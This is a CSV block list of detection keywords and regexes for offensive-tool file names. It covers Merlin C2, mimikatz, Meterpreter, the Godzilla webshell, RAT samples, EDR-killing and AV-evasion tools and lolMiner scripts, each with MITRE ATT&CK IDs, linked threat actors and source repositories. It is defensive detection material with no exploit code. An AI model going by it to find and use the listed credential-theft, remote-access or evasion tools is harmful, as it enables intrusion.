"*\Mega RAT 1.5 Beta.exe*",".{0,1000}\\Mega\sRAT\s1\.5\sBeta\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16455"
"*\mem_dll.pdb*",".{0,1000}\\mem_dll\.pdb.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","16543"
"*\merlin.dll*",".{0,1000}\\merlin\.dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","16544"
"*\merlin\data\modules\*",".{0,1000}\\merlin\\data\\modules\\.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","16545"
"*\merlinAgent-*.exe*",".{0,1000}\\merlinAgent\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","16546"
"*\merlin-agent\*.go*",".{0,1000}\\merlin\-agent\\.{0,1000}\.go.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","16547"
"*\merlin-agent-dll*",".{0,1000}\\merlin\-agent\-dll.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","16548"
"*\merlin-agent-dll\*",".{0,1000}\\merlin\-agent\-dll\\.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","16549"
"*\met_inject.py*",".{0,1000}\\met_inject\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16563"
"*\metasploit.go*",".{0,1000}\\metasploit\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","16564"
"*\metasploit-omnibus-main*",".{0,1000}\\metasploit\-omnibus\-main.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16565"
"*\metasploit-omnibus-master*",".{0,1000}\\metasploit\-omnibus\-master.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16566"
"*\Meterpeter_*.zip*",".{0,1000}\\Meterpeter_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16567"
"*\meterpreter.php*",".{0,1000}\\meterpreter\.php.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","16568"
"*\Meterpreter.py*",".{0,1000}\\Meterpreter\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","16569"
"*\meterpreter.rc*",".{0,1000}\\meterpreter\.rc.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","16570"
"*\meterpreterTip.txt*",".{0,1000}\\meterpreterTip\.txt.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","16571"
"*\meterpreterTip2.txt*",".{0,1000}\\meterpreterTip2\.txt.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","16572"
"*\mhydeath64*",".{0,1000}\\mhydeath64.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","16573"
"*\MiCROSOFT_R.A.T_1.0.exe*",".{0,1000}\\MiCROSOFT_R\.A\.T_1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16580"
"*\mimi32.exe*",".{0,1000}\\mimi32\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16581"
"*\mimi64.exe*",".{0,1000}\\mimi64\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16582"
"*\mimicom.idl*",".{0,1000}\/mimicom\.idl.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16583"
"*\mimidogz-master*",".{0,1000}\\mimidogz\-master.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","16584"
"*\mimidropper.hta*",".{0,1000}\\mimidropper\.hta.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","16585"
"*\mimidrv.pdb*",".{0,1000}\\mimidrv\.pdb.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16586"
"*\mimikatz.bin*",".{0,1000}\\mimikatz\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","16587"
"*\mimikatz.exe*",".{0,1000}\\mimikatz\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","mimikatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16588"
"*\mimikatz.py*",".{0,1000}\\mimikatz\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16589"
"*\mimikatz.py*",".{0,1000}\\mimikatz\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","16590"
"*\mimilib.dll*",".{0,1000}\\mimilib\.dll.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","16591"
"*\mimipy.py*",".{0,1000}\\mimipy\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","16592"
"*\mine_aleph.bat*",".{0,1000}\\mine_aleph\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16593"
"*\mine_beam.bat*",".{0,1000}\\mine_beam\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16594"
"*\mine_bittube.bat*",".{0,1000}\\mine_bittube\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16595"
"*\mine_btg.bat*",".{0,1000}\\mine_btg\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16596"
"*\mine_cortex.bat*",".{0,1000}\\mine_cortex\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16597"
"*\mine_ergo.bat*",".{0,1000}\\mine_ergo\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16598"
"*\mine_etc.bat*",".{0,1000}\\mine_etc\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16599"
"*\mine_eth.bat*",".{0,1000}\\mine_eth\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16600"
"*\mine_eth_lhr_admin.bat*",".{0,1000}\\mine_eth_lhr_admin\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16601"
"*\mine_ethw.bat*",".{0,1000}\\mine_ethw\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16602"
"*\mine_ethw_lhr_admin.bat*",".{0,1000}\\mine_ethw_lhr_admin\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16603"
"*\mine_flux.bat*",".{0,1000}\\mine_flux\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16604"
"*\mine_flux_admin.bat*",".{0,1000}\\mine_flux_admin\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16605"
"*\mine_gram.bat*",".{0,1000}\\mine_gram\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16606"
"*\mine_grin_32.bat*",".{0,1000}\\mine_grin_32\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16607"
"*\mine_ironfish.bat*",".{0,1000}\\mine_ironfish\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16608"
"*\mine_ironfish_gram.bat*",".{0,1000}\\mine_ironfish_gram\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16609"
